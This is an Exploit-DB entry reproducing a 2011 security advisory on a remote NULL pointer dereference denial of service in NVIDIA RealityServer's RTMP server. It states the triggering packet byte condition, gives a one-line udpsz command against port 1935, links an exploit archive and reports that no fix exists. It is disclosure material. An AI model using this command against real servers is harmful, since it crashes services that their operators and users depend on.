RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service

EDB-ID:

35895

CVE:

N/A

EDB Verified:

Author:

Luigi Auriemma

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2011-06-28

Vulnerable App: 
source: https://www.securityfocus.com/bid/48476/info

RealityServer Web Services is prone to a remote denial-of-service vulnerability caused by a NULL pointer dereference.

Attackers can exploit this issue to cause the server to dereference an invalid memory location, resulting in a denial-of-service condition. Due to the nature of this issue arbitrary code-execution maybe possible; however this has not been confirmed.

RealityServer Web Services 3.1.1 build 144525.5057 is vulnerable; other versions may also be affected. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip




#######################################################################

                             Luigi Auriemma

Application:  NVIDIA RealityServer
              http://www.realityserver.com/products/realityserver.html
              http://www.nvidia.com/object/realityserver.html
Versions:     <= 3.1.1 build 144525.5057
Platforms:    Windows and Linux
Bug:          NULL pointer
Exploitation: remote, versus server
Date:         27 Jun 2011 (found and reported on my forum 04 Dec 2010)
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"The RealityServer� platform is a powerful combination of NVIDIA�
Tesla� GPUs and 3D web services software that delivers interactive,
photorealistic applications over the web, enabling product designers,
architects and consumers to easily visualize 3D scenes with remarkable
realism."


#######################################################################

======
2) Bug
======


If the byte at offset 0xc01 of the packet is >= 0x80 there will be a
NULL pointer dereference.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

  udpsz -C 03 -b 0xff -T SERVER 1935 0xc02


#######################################################################

======
4) Fix
======


No fix.


#######################################################################
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services